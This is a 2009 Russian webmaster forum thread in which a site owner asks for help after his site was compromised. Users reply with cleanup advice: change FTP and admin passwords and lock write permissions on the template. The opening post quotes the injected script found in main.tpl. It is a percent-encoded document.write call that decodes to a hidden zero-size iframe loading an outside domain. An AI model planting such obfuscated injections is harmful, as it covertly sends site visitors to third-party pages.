X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> левый скрипт
alexruss
alexruss
Topic Starter сообщение 3.1.2009, 1:21; Ответить: alexruss
Сообщение #1


собственно сегогдня захожу в статистику своего сайта и вижу что с него уже ушло около 200 человек на сайт m a j o r n o . n e t .r u ну я зашол в админку нашол в main.tpl такой скрипт <script type="text/javascript">
document.write(unescape('%3C%49%46%52%41%4D%45%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%73%6F%66%74%2D%6D%65%64%69%61%2E%6F%72%67%2E%72%75%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%49%46%52%41%4D%45%3E'));</script> скрипт удалил переходы вроде остановились потом к вечеру ближе захожу на сайт смотрю на сайте появился еще один админ кроме меня ну его я удалил и скрипт снова на сайте скрипт я тоже удалил пароли поменял но вопросы остались как могло ето все случится??? пароли я никаму вроде не давал


пс. да и еще какойто скрипт страный как узнать что в нем находится//????

Сообщение отредактировал alexruss - 3.1.2009, 1:23


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
IamWolf
IamWolf
сообщение 3.1.2009, 1:27; Ответить: IamWolf
Сообщение #2


FTP пасы меняй, и почты, так как кеши Тотал командера украли (предположение)


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexruss
alexruss
Topic Starter сообщение 3.1.2009, 1:28; Ответить: alexruss
Сообщение #3


да ето возможно так как там пасы у меня были сохранены


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mr4q
mr4q
сообщение 3.1.2009, 1:28; Ответить: mr4q
Сообщение #4


Траф пропал, т.к гугл повесил предупреждение о том, что ваш сайт может нанести вред пользователям (из-за наличия вредоносного кода на страницах), а как случилось .... протроянили вас скорей всего )

Сообщение отредактировал mr4q - 3.1.2009, 1:31


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexruss
alexruss
Topic Starter сообщение 3.1.2009, 1:35; Ответить: alexruss
Сообщение #5


(mr4q @ 3.1.2009, 1:28) *
Траф пропал, т.к гугл повесил предупреждение о том, что ваш сайт может нанести вред пользователям (из-за наличия вредоносного кода на страницах), а как случилось .... протроянили вас скорей всего )



нет траф как раз не пропал просто с моего сайта на етот сайт шол через фрейм как я понимаю да и гугл не вешал предупреждение

Сообщение отредактировал alexruss - 3.1.2009, 1:35


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
skyman
skyman
сообщение 3.1.2009, 1:38; Ответить: skyman
Сообщение #6


Стояли попандеры на сайтах находящихся на хостинге, была такая же стория, думал долго что делать, тупо далял эти строчки, ждал неделю, появлялись обратно, убрал на файле main.tpl права на запись все нормализовалось

пс. да и еще какойто скрипт страный как узнать что в нем находится//????


вместо unescape написать alert

Сообщение отредактировал skyman - 3.1.2009, 1:38


--------------------
нет подписи


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexruss
alexruss
Topic Starter сообщение 3.1.2009, 1:40; Ответить: alexruss
Сообщение #7


(skyman @ 3.1.2009, 1:38) *
Стояли попандеры на сайтах находящихся на хостинге, была такая же стория, думал долго что делать, тупо далял эти строчки, ждал неделю, появлялись обратно, убрал на файле main.tpl права на запись все нормализовалось



вместо unescape написать alert



на сайте из попандеров стоит только pop-under.ru но не думаю что он виноват так как раньше такого не было хотя в последнее время про него слухи ходили

Сообщение отредактировал alexruss - 3.1.2009, 1:41


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
brabus55
brabus55
сообщение 3.1.2009, 1:46; Ответить: brabus55
Сообщение #8


Прошел я уже через это.
1.Сперва меняешь пароли на фтп
2.Удаляешь скрипт
3.Меняешь пароли в админку сайта

Этот скрипт ворует бэкап базы данных.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Скрипт поисковика видео StrongTube
3 3josoft 1561 14.8.2023, 14:45
автор: 3josoft
Открытая тема (нет новых ответов) Скрипт приема платежей p2p с карты на карту card2card
Скрипт приема платежей p2p с карты на карту card2card
15 zladey1986 7780 26.3.2023, 8:54
автор: Palundra
Открытая тема (нет новых ответов) Продам скрипт перевода постов и комментариев
4 Tutich 749 19.1.2023, 17:23
автор: Tutich
Открытая тема (нет новых ответов) Битрикс скрипт нативной установки
3 Nemo 2439 20.11.2022, 10:09
автор: Webmaster24
Открытая тема (нет новых ответов) Посоветуйте скрипт интернет-магазина
(партнерская программа - критична!)
9 Aloof 7317 2.12.2021, 15:03
автор: Ilonek


 



RSS Текстовая версия Сейчас: 29.3.2024, 11:10
Дизайн